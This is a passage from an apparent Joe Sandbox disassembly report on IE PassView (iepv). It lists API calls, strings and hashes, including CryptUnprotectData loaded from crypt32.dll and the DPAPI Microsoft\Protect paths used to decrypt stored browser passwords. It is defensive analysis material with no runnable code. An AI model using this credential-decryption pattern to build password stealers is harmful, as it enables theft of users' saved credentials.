                                        • CloseHandle.KERNEL32(00000000,0040BDFE,?), ref: 0040C466
                                        Similarity
                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3974772901-0
                                        APIs
                                        • memset.MSVCRT ref: 0040A9A6
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                          • Part of subcall function 00405E23: memset.MSVCRT ref: 00405E44
                                          • Part of subcall function 00405E23: sprintf.MSVCRT ref: 00405E6D
                                          • Part of subcall function 00405E23: strlen.MSVCRT ref: 00405E79
                                          • Part of subcall function 00405E23: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405E8E
                                          • Part of subcall function 00405E23: strlen.MSVCRT ref: 00405E9C
                                          • Part of subcall function 00405E23: memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405EAC
                                          • Part of subcall function 00405C08: _mbscpy.MSVCRT(?,?), ref: 00405C6E
                                        Strings
                                        Similarity
                                        • API ID: memcpystrlen$HandleModule_mbscpymemset$LoadStringsprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 1772356520-3614832568
                                        APIs
                                        • strlen.MSVCRT ref: 004033D2
                                        • strlen.MSVCRT ref: 004033DF
                                        • strlen.MSVCRT ref: 0040340F
                                        • strlen.MSVCRT ref: 0040341D
                                          • Part of subcall function 00405918: _mbscpy.MSVCRT(?,?,?,00403438,?,Application Data\Microsoft\Protect,?,?,?,00000000,00402C40,?), ref: 00405920
                                          • Part of subcall function 00405918: _mbscat.MSVCRT ref: 0040592F
                                        Strings
                                        Similarity
                                        • API ID: strlen$_mbscat_mbscpy
                                        • String ID: AppData\Roaming\Microsoft\Protect$Application Data\Microsoft\Protect
                                        • API String ID: 2369969472-36309976
                                        APIs
                                        • memset.MSVCRT ref: 004022CB
                                        • memset.MSVCRT ref: 004022E4
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 004022FB
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 0040231A
                                        • strlen.MSVCRT ref: 0040232C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040233D
                                        Similarity
                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                        • String ID:
                                        • API String ID: 1786725549-0
                                        APIs
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040ABCF
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ABE1
                                        • GetTempFileNameA.KERNEL32(?,0040EF2C,00000000,?), ref: 0040AC03
                                        • OpenClipboard.USER32(?), ref: 0040AC23
                                        • GetLastError.KERNEL32 ref: 0040AC3C
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040AC59
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040169E
                                        • GetSystemMetrics.USER32(00000015), ref: 004016AC
                                        • GetSystemMetrics.USER32(00000014), ref: 004016B8
                                        • BeginPaint.USER32(?,?), ref: 004016D2
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E1
                                        • EndPaint.USER32(?,?), ref: 004016EE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: fcb7e482eb76ba8090ad36150f4fcea21044d1364904f0aff478c34c2a334ba8
                                        • Instruction ID: 51d58632dde0b2df19cce2622bda81a95d759c7467a932302152d961ccb82f95
                                        • Opcode Fuzzy Hash: fcb7e482eb76ba8090ad36150f4fcea21044d1364904f0aff478c34c2a334ba8
                                        • Instruction Fuzzy Hash: AC014B72910218EFDF04DFA9DD489FEBBBDFB49301F000929EA11BA194DB71A914CB90
                                        APIs
                                        • memset.MSVCRT ref: 0040AB3B
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                        • sprintf.MSVCRT ref: 0040AB68
                                        • MessageBoxA.USER32(?,00000000,IE PassView,00000024), ref: 0040AB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: HandleModule$LoadMessageString_mbscpymemcpymemsetsprintfstrlen
                                        • String ID: %s%s$IE PassView
                                        • API String ID: 4065552295-2879795094
                                        • Opcode ID: 9df0477533ba83204a857130b0cef703b924667a782a429e98ea27dafaf9c7a3
                                        • Instruction ID: f6a349c11968531fa7dfc28a6d2e01e9891fc91bb9518483c4496ef7fa76d560
                                        • Opcode Fuzzy Hash: 9df0477533ba83204a857130b0cef703b924667a782a429e98ea27dafaf9c7a3
                                        • Instruction Fuzzy Hash: 8701A7B2A443047BD721A6759C47FAA73AC9B05708F10087AF709FA1C2E67CBA55462F
                                        APIs
                                        • memset.MSVCRT ref: 00407963
                                        • sprintf.MSVCRT ref: 00407978
                                          • Part of subcall function 00407A13: memset.MSVCRT ref: 00407A37
                                          • Part of subcall function 00407A13: GetPrivateProfileStringA.KERNEL32(004121F8,0000000A,0040E470,?,00001000,004120F0), ref: 00407A59
                                          • Part of subcall function 00407A13: _mbscpy.MSVCRT(?,?), ref: 00407A73
                                        • SetWindowTextA.USER32(?,?), ref: 0040799F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$PrivateProfileStringTextWindow_mbscpysprintf
                                        • String ID: caption$dialog_%d
                                        • API String ID: 336690586-4161923789
                                        • Opcode ID: ac7cc4696a89eb1cba6d083646845e466a8c7c1c47553c4c710892c2a750e08b
                                        • Instruction ID: e676f763466c337fa742e808a0462136ccf328752376158856b18cf97ff1e9ac
                                        • Opcode Fuzzy Hash: ac7cc4696a89eb1cba6d083646845e466a8c7c1c47553c4c710892c2a750e08b
                                        • Instruction Fuzzy Hash: DDF0BB709442497AEB12E7A5CD06FC93A6C6B08745F0040B2BB44F51D1D7F8A9E48B5F
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessagesprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 1670431679-1552265934
                                        • Opcode ID: 841bd09bb5ef585932fac9cdc1f85acd03c61bd054173f3906aa32b2af69f6f6
                                        • Instruction ID: 77d8efe28dd78b6f0643021b09889a2d3b867daaa4c0b42a6eec78336504f6ab
                                        • Opcode Fuzzy Hash: 841bd09bb5ef585932fac9cdc1f85acd03c61bd054173f3906aa32b2af69f6f6
                                        • Instruction Fuzzy Hash: D5F0A7F64001186BDB20A656DC05F9676BCEB40344F140476FA05F21C0EA74DA158F59
                                        APIs
                                        • LoadLibraryA.KERNEL32(crypt32.dll,004032F8,Microsoft_WinInet,004066B9,?,?,?,?,00000000), ref: 004032AC
                                        • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 004032BE
                                        • FreeLibrary.KERNEL32(00000000), ref: 004032E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: CryptUnprotectData$crypt32.dll
                                        • API String ID: 145871493-1827663648
                                        • Opcode ID: bf59056d1eee5cbda9ce93750894b4eac22a5dcb94889e471285fb9aaac960fc
                                        • Instruction ID: c01f5e3405d155f9615ee7ba2b3405c7219808126caa219960ebcac386442010
                                        • Opcode Fuzzy Hash: bf59056d1eee5cbda9ce93750894b4eac22a5dcb94889e471285fb9aaac960fc
                                        • Instruction Fuzzy Hash: 94F09870640711CBEB249F66CA49753BAECAB00707F10CC7DE49AE66D0D7B9D550CB18
                                        APIs
                                        • memset.MSVCRT ref: 0040393E
                                        • _snprintf.MSVCRT ref: 004039A5
                                          • Part of subcall function 0040639C: strlen.MSVCRT ref: 004063C3
                                          • Part of subcall function 0040639C: strlen.MSVCRT ref: 004063D0
                                          • Part of subcall function 004063F9: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,00402B17,?,?,?,?), ref: 0040640F
                                          • Part of subcall function 004063F9: strlen.MSVCRT ref: 0040645D
                                          • Part of subcall function 004063F9: strlen.MSVCRT ref: 00406465
                                        • strlen.MSVCRT ref: 004039F2
                                        • strlen.MSVCRT ref: 004039FD
                                          • Part of subcall function 004056DE: strlen.MSVCRT ref: 004056E3
                                          • Part of subcall function 004056DE: memcpy.MSVCRT(?,?,00000000,?,00401F7D,?), ref: 004056F8
                                        Strings
                                        • %8.8X-%4.4X-%4.4X-%2.2X%2.2X-%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X, xrefs: 0040399D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$FileFindFirst_snprintfmemcpymemset
                                        • String ID: %8.8X-%4.4X-%4.4X-%2.2X%2.2X-%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X
                                        • API String ID: 3610737902-4003780816
                                        • Opcode ID: 5938a84a3a5096475608d5aad8b60bcbdd3638d88dcc76a6290295a6f1b42c4b
                                        • Instruction ID: 38ea13b14110fb611f5d2deffdce458bca4dc30c850e1321a484ceb1a5631d69
                                        • Opcode Fuzzy Hash: 5938a84a3a5096475608d5aad8b60bcbdd3638d88dcc76a6290295a6f1b42c4b
                                        • Instruction Fuzzy Hash: 9241A1B1A001599BCB04DAA9CC419FF77AC9B44315F40016AF846F71C1E678AA85CB69
                                        APIs
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081B7
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081C5
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081D6
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081ED
                                          • Part of subcall function 004081AB: ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081F6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 0040822C
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 0040823F
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 00408252
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040B968,?,00000000,00000000), ref: 00408265
                                        • free.MSVCRT ref: 0040829E
                                          • Part of subcall function 004060D5: free.MSVCRT ref: 004060DC
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: d40dc89c096fa528deae5bf6a4c41c3a11779ecb420b88136e724b5d073612da
                                        • Instruction ID: 0033a09393801e04a52900815f5e32bdd2be366de1ac8b2c487ed1914441202d
                                        • Opcode Fuzzy Hash: d40dc89c096fa528deae5bf6a4c41c3a11779ecb420b88136e724b5d073612da
                                        • Instruction Fuzzy Hash: BF01E532E01D305BC626BB6AA90541FB394AF8672030682BFF886773C18F3C6C4246DD
                                        APIs
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        • memset.MSVCRT ref: 004091AB
                                           • Part of subcall function 0040D0C2: memcpy.MSVCRT(?,<,00000004,?,?,00000000,004091CC,?,?), ref: 0040D130
                                          • Part of subcall function 00408C16: _mbscpy.MSVCRT(00000000,?,004091E1,?,?,?), ref: 00408C1B
                                          • Part of subcall function 00408C16: _strlwr.MSVCRT ref: 00408C5E
                                        • sprintf.MSVCRT ref: 004091F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 3337535707-2769808009
                                        • Opcode ID: 8e9a29ac9f4a23b6f82cdd24553fda3ede00e5e2678d7fcfdccf6d3a88681ffd
                                        • Instruction ID: 92280242408d335295641b7a7e4fe2c562f8bd416bcfcaf38d4b260d20b3f19f
                                        • Opcode Fuzzy Hash: 8e9a29ac9f4a23b6f82cdd24553fda3ede00e5e2678d7fcfdccf6d3a88681ffd
                                        • Instruction Fuzzy Hash: 5D11E33190061ABFDB11AF55CC42F997B64FF08328F10007AF808765E2C779B9A0DB98
                                        APIs
                                        • GetParent.USER32(?), ref: 00407839
                                        • GetWindowRect.USER32(?,?), ref: 00407846
                                        • GetClientRect.USER32(00000000,?), ref: 00407851
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00407861
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040787D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 8340e04b85906bd98d07a4f2b488c610fe3b5b94f9825e5ac61aef3b622d6b89
                                        • Instruction ID: 0af8d93023ce6edc03cfe1a7952551e03fdd8b742c1bc2359a0d55ce5666e187
                                        • Opcode Fuzzy Hash: 8340e04b85906bd98d07a4f2b488c610fe3b5b94f9825e5ac61aef3b622d6b89
                                        • Instruction Fuzzy Hash: CA012D32801129ABDB11ABA69D4DEFFBFBCEF06754F044529F915B2140D7389501CBA5
                                        APIs
                                        • memset.MSVCRT ref: 00409493
                                        • memset.MSVCRT ref: 004094A9
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                          • Part of subcall function 00408C16: _mbscpy.MSVCRT(00000000,?,004091E1,?,?,?), ref: 00408C1B
                                          • Part of subcall function 00408C16: _strlwr.MSVCRT ref: 00408C5E
                                        • sprintf.MSVCRT ref: 004094E0
                                        Strings
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004094AE
                                        • <%s>, xrefs: 004094DA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 3699762281-1998499579
                                        • Opcode ID: 6e654cf32214f9afde9f8d02956914338a5825c5c9d3e120d1f05758333a65fd
                                        • Instruction ID: f6ae4f78776c0d50e5f732e7396b25190cc3ca3b33437b2577dc2bf549dc7d25
                                        • Opcode Fuzzy Hash: 6e654cf32214f9afde9f8d02956914338a5825c5c9d3e120d1f05758333a65fd
                                        • Instruction Fuzzy Hash: 2B01A7B290011967DB20A655CC46FDB7A7CDF54315F0400BAB509F31C2DB789A948BB5
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081B7
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081C5
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081D6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081ED
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004083D6), ref: 004081F6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: e6acfa7396b52a114121f7a4b8c1391fec31caade5ddf845c65d966cde2c90b6
                                        • Instruction ID: 30514a08b015e64f468dc56151b9c8415313b9cb726f4dfed3d47dcf498ace6e
                                        • Opcode Fuzzy Hash: e6acfa7396b52a114121f7a4b8c1391fec31caade5ddf845c65d966cde2c90b6
                                        • Instruction Fuzzy Hash: CDF04FB2A047014BD7209FAE99C085BB3D9BF0A314760883FF0C9E7691CB38F8854A1C
                                        APIs
                                        • BeginDeferWindowPos.USER32(00000004), ref: 00404D5F
                                          • Part of subcall function 004015EF: GetDlgItem.USER32(?,?), ref: 004015FF
                                          • Part of subcall function 004015EF: GetClientRect.USER32(?,?), ref: 00401611
                                          • Part of subcall function 004015EF: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167B
                                        • EndDeferWindowPos.USER32(00000000), ref: 00404DAD
                                        • InvalidateRect.USER32(?,?,00000001), ref: 00404DB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                        • String ID: $
                                        • API String ID: 2498372239-3993045852
                                        • Opcode ID: 715fc5b0b7331e490694d994f071c2009a6bcabda0f169ec3166fcfd20ad611d
                                        • Instruction ID: 0d0d544e0b6c92358beb98dd67f43578e8bfaef22e056f663664e6f497536415
                                        • Opcode Fuzzy Hash: 715fc5b0b7331e490694d994f071c2009a6bcabda0f169ec3166fcfd20ad611d
                                        • Instruction Fuzzy Hash: 15119BB0640218BFE7156F55CCC5F6F766CDF91B99F10403BF6057A1E0C6749E0186A9
                                        APIs
                                        • memset.MSVCRT ref: 00407A37
                                        • GetPrivateProfileStringA.KERNEL32(004121F8,0000000A,0040E470,?,00001000,004120F0), ref: 00407A59
                                        • _mbscpy.MSVCRT(?,?), ref: 00407A73
                                        Strings
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00407A20
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
